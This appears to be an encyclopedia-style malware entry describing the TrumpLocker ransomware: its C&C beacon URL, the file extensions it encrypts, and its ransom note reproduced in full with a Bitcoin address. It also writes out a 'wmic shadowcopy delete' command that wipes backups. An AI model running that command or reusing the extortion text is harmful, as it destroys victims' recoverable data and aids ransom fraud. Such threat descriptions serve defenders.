TrumpLocker
TrumpLocker is a ransomware Trojan that receives its name because it features an image of the United States President Donald Trump as part of its ransom note. Payload Transmission TrumpLocker is transmitted through corrupted email attachments. Infection TrumpLocker infections start when a user launches the TrumpLocker.exe file. When this file executes, the first thing it does is to connect to its C&C server by accessing the following URL: https://3q27hfpradjovwyo.onion.cab/ran/gen.php?u=[computer-name]\[login-name] By default, the C&C server responds with a public key to encrypt the victim's files with and the ransom amount in USD and Bitcoin. Currently, the ransom fee is set to 0.145 Bitcoin, which is around $165. After receiving the public encryption key, the ransomware starts the file encryption process, which doesn't follow regular conventions. Trump Locker has a list of files it targets for encryption, just like other ransomware families. What's different is that Trump Locker fully encrypts certain file types, while for others it only encrypts the first 1024 bytes of each file. This behavior has only been spotted in previous VenusLocker variants. TrumpLocker fully encrypts the following file types: .txt, .ini, .php, .html, .css, .py, .c, .cpp, .cc, .h, .cs, .log, .pl, .java, .doc, .dot, .docx, .docm, .dotx, .dotm, .rtf, .wpd, .docb, .wps, .msg, .xls, .xlt, .xlm, .xlsx, .xlsm, .xltx, .xltm, xlsb, .xla, .xlam, .xll, .xlw, .ppt, .pot, .pps, .pptx, .pptm, .potx, .potm, .ppam, .ppsx, .ppsm, .sldx, .sldm, .class, .jar, .csv, .xml, .dwg, .dxf, .asp However, the file types below are only encrypted partially during a TrumpLocker attack: .asf, .pdf, .xls, .docx, .xlsx, .mp3, .waw, .jpg, .jpeg, .txt, .rtf, .doc, .rar, .zip, .psd, .tif, .wma, .gif, .bmp, .ppt, .pptx, .docm, .xlsm, .pps, .ppsx, .ppd, .eps, .png, .ace, .djvu, .tar, .cdr, .max, .wmv, .avi, .wav, .mp4, .pdd, .php, .aac, .ac3, .amf, .amr, .dwg, .dxf, .accdb, .mod, .tax2013, .tax2014, .oga, .ogg, .pbf, .ra, .raw, .saf, .val, .wave, .wow, .wpk, .3g2, .3gp, .3gp2, .3mm, .amx, .rpt, .avs, .bik, .dir, .divx, .dvx, .evo, .flv, .qtq, .tch, .rts, .rum, .rv, .scn, .srt, .stx, .svi, .swf, .trp, .vdo, .wm, .wmd, .wmmp, .wmx, .wvx, .xvid, .3d, .3d4, .3df8, .pbs, .adi, .ais, .amu, .arr, .bmc, .bmf, .cag, .cam, .dng, .ink, .ini, .jif, .jiff, .jpc, .jpf, .jpw, .mag, .mic, .mip, .msp, .nav, .ncd, .odc, .odi, .opf, .qif, .xwd, .abw, .act, .adt, .aim, .ans, .asc, .ase, .bdp, .bdr, .bib, .boc, .crd, .diz, .dot, .dotm, .dotx, .dvi, .dxe, .mlx, .err, .euc, .faq, .fdr, .fds, .gthr, .idx, .kwd, .lp2, .ltr, .man, .mbox, .msg, .nfo, .now, .odm, .oft, .pwi, .rng, .rtx, .run, .ssa, .text, .unx, .wbk, .wsh, .7z, .arc, .ari, .arj, .car, .cbr, .cbz, .gz, .gzig, .jgz, .pak, .pcv, .puz, .rev, .sdn, .sen, .sfs, .sfx, .sh, .shar, .shr, .sqx, .tbz2, .tg, .tlz, .vsi, .wad, .war, .xpi, .z02, .z04, .zap, .zipx, .zoo, .ipa, .isu, .jar, .js, .udf, .adr, .ap, .aro, .asa, .ascx, .ashx, .asmx, .asp, .indd, .asr, .qbb, .bml, .cer, .cms, .crt, .dap, .htm, .moz, .svr, .url, .wdgt, .abk, .bic, .big, .blp, .bsp, .cgf, .chk, .col, .cty, .dem, .elf, .ff, .gam, .grf, .h3m, .h4r, .iwd, .ldb, .lgp, .lvl, .map, .md3, .mdl, .nds, .pbp, .ppf, .pwf, .pxp, .sad, .sav, .scm, .scx, .sdt, .spr, .sud, .uax, .umx, .unr, .uop, .usa, .usx, .ut2, .ut3, .utc, .utx, .uvx, .uxx, .vmf, .vtf, .w3g, .w3x, .wtd, .wtf, .ccd, .cd, .cso, .disk, .dmg, .dvd, .fcd, .flp, .img, .isz, .mdf, .mds, .nrg, .nri, .vcd, .vhd, .snp, .bkf, .ade, .adpb, .dic, .cch, .ctt, .dal, .ddc, .ddcx, .dex, .dif, .dii, .itdb, .itl, .kmz, .lcd, .lcf, .mbx, .mdn, .odf, .odp, .ods, .pab, .pkb, .pkh, .pot, .potx, .pptm, .psa, .qdf, .qel, .rgn, .rrt, .rsw, .rte, .sdb, .sdc, .sds, .sql, .stt, .tcx, .thmx, .txd, .txf, .upoi, .vmt, .wks, .wmdb, .xl, .xlc, .xlr, .xlsb, .xltx, .ltm, .xlwx, .mcd, .cap, .cc, .cod, .cp, .cpp, .cs, .csi, .dcp, .dcu, .dev, .dob, .dox, .dpk, .dpl, .dpr, .dsk, .dsp, .eql, .ex, .f90, .fla, .for, .fpp, .jav, .java, .lbi, .owl, .pl, .plc, .pli, .pm, .res, .rsrc, .so, .swd, .tpu, .tpx, .tu, .tur, .vc, .yab, .aip, .amxx, .ape, .api, .mxp, .oxt, .qpx, .qtr, .xla, .xlam, .xll, .xlv, .xpt, .cfg, .cwf, .dbb, .slt, .bp2, .bp3, .bpl, .clr, .dbx, .jc, .potm, .ppsm, .prc, .prt, .shw, .std, .ver, .wpl, .xlm, .yps, .1cd, .bck, .html, .bak, .odt, .pst, .log, .mpg, .mpeg, .odb, .wps, .xlk, .mdb, .dxg, .wpd, .wb2, .dbf, .ai, .3fr, .arw, .srf, .sr2, .bay, .crw, .cr2, .dcr, .kdc, .erf, .mef, .mrw, .nef, .nrw, .orf, .raf, .rwl, .rw2, .r3d, .ptx, .pef, .srw, .x3f, .der, .pem, .pfx, .p12, .p7b, .p7c, .jfif, .exif, .docb, .xlt, .xltm, .xlw, .ppam, .sldx, .sldm, .class, .db, .pdb, .dat, .csv, .xml, .spv, .grle, .sv5, .game, .slot, .aaf, .aep, .aepx, .plb, .prel, .prproj, .eat, .ppj, .indl, .indt, .indb, .inx, .idml, .pmd, .xqx, .svg, .as3, .as When performing the encryption, TrumpLocker first checks if the file extension is in the full encryption list first. If it is, it fully encrypts the file regardless of whether that same extension is also in the partial list. When encrypting files it will base64 encode the original filename and then append the encrypted extension at the end. This operation makes the identification of sensitive files much harder. Once the encryption process ends, Trump Locker will now focus on showing its ransom demands. This happens in three ways, through a convoluted process. First, the ransomware drops a file named "What happen to my files.txt" on the user's desktop which reads: --- The Trump Locker --- Unfortunately, you are hacked. 1. What happened to my files? Your personal files, including your photos, documents, videos and other important files on this computer, have been encrypted with RSA-4096, the strongest encryption algorithm. RSA algorithm generates a public key and a private key for your computer. The public key was used to encrypt your files a moment ago. The private key is necessary for you to decrypt and recover your files. Now, your private key is stored on our secret Internet server. And there is no doubt that no one can recover your files without your private key. For further information about RSA algorithm, please refer to https://en.wikipedia.org/wiki/RSA_(cryptosystem) 2. How to decrypt my files? To decrypt and recover your files, you have to pay #ramt# US Dollars for the private key and decryption service. Please note that you have ONLY 72 HOURS to complete your payment. If your payment do not be completed within time limit, your private key will be deleted automatically by our server. All your files will be permanently encrypted and nobody can recover them. Therefore, it is advised that you'd better not waste your time, because there is no other way to recover your files except making a payment. 3. How to pay for my private key? There are three steps to make a payment and recover your files: 1). For the security of transactions, all the payments must be completed via Bitcoin network. Thus, you need to exchange #ramt# US dollars (or equivalent local currencies) to Bitcoins, and then send these Bitcoins (about #btc# BTC) to the following address. 1N82pq3XovKoJYqUmTrRiXftpNHZyu4jyv 2). Send your personal ID to our official email: TheTrumpLocker@mail2tor.com Your personal ID is: #id# 3). You will receive a decryptor and your private key to recover all your files within one working day. 4. What is Bitcoin? Bitcoin is an innovative payment network and a new kind of money. It is based on an open-source cryptographic protocol that is independent of any central authority. Bitcoins can be transferred through a computer or a smartphone withour an intermediate financial institution. 5. How to make a payment with Bitcoin? You can make a payment with Bitcoin based on Bitcoin Wallet or Based on Perfect Money. You can choose the way that is more convenient for you. About Based on Bitcoin Wallet 1) Create a Bitcoin Wallet. We recommend Blockchain.info (https://blockchain.info/) 2) Buy necessary amount of Bitcoins. Our recommendations are as follows. LocalBitcoins.com -- the fastest and easiest way to buy and sell Bitcoins. CoinCafe.com -- the simplest and fastest way to buy, sell and use Bitcoins. BTCDirect.eu -- the best for Europe. CEX.IO -- Visa / MasterCard CoinMama.com -- Visa / MasterCard HowToBuyBitcoins.info -- discover quickly how to buy and sell Bitcoins in your local currency. 3) As mentioned above, send about #btc# BTC (equivalent to #ramt# USD) to our Bitcoin receiving address. 4) As mentioned above, and then, send us your personal ID via email, you will receive your private key soon. About Based on Perfect Money 1) Create a Perfect Money account. (https://perfectmoney.is) 2) Visit to PMBitcoin.com. (https://pmbitcoin.com/btc) input our Bitcoin receiving address in the \"Bitcoin Wallet\" textbox. input #ramt# in the \"Amount\" textbox, the amount of Bitcoin will be calculated automatically. click \"PAY\" button, then you can complete you payment with your Perfect Money account and local debit card. 6. If you have any problem, please feel free to contact us via official email. Best Regards The Trump Locker Team Then, Trump Locker drops a file named uinf.uinf on disk, which contains the responses from the C&C server. This file acts like a configuration file and is used by the RansomNote.exe program. The following step is for Trump Locker to extract a file named RansomNote.exe from the main installer (TrumpLocker.exe), which it drops on the user's desktop. After this, the ransom executes the following command, which deletes local shadow volume copies, making recovery of previous files versions impossible. C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete&exit It then changes the user's wallpaper with the following image, which it downloads from this Imgur URL: http://i.imgur.com/g4Ly4AD.jpg The final state is to execute the RansomNote.exe file, the ransomware left in an earlier step on the user's desktop. When this file executes, it shows a splash image portraying Donald Trump and the text "YOU ARE HACKED!!" This image doesn't stay long on the victim's screen and is replaced by a new window, which shows ransom payment information. Once again, this is another dead giveway that TrumpLocker and VenusLocker are related, as both screens are nearly identical. Media Category:Ransomware Category:Win32 ransomware Category:Win32 Category:Microsoft Windows Category:Trojan Category:Win32 trojan